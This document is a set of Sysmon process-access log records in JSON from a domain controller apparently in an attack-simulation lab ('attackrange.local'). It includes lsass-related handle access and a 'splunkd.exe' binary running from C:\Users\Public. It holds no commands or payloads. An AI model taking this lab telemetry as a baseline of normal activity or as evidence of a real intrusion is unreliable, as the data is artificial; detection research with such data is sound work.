{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5809,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.526\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.526","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5810,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.807\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.807","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5811,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.807\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.807","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5812,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.807\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.807","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5813,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.807\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001036DE0600}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.807","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001036DE0600}","TargetProcessId":"4852","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5814,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.807\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001036DE0600}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.807","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001036DE0600}","TargetProcessId":"4852","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5815,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.823\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-00108A780800}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.823","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-00108A780800}","TargetProcessId":"4852","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5816,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.823\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 3028\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-00108A780800}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x101541\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+43f7|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+15538|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+2227|C:\\Windows\\system32\\wbem\\wbemcore.dll+13f4|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.823","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"3028","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-00108A780800}","TargetProcessId":"4852","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x101541","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+43f7|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+15538|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+2227|C:\\Windows\\system32\\wbem\\wbemcore.dll+13f4|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
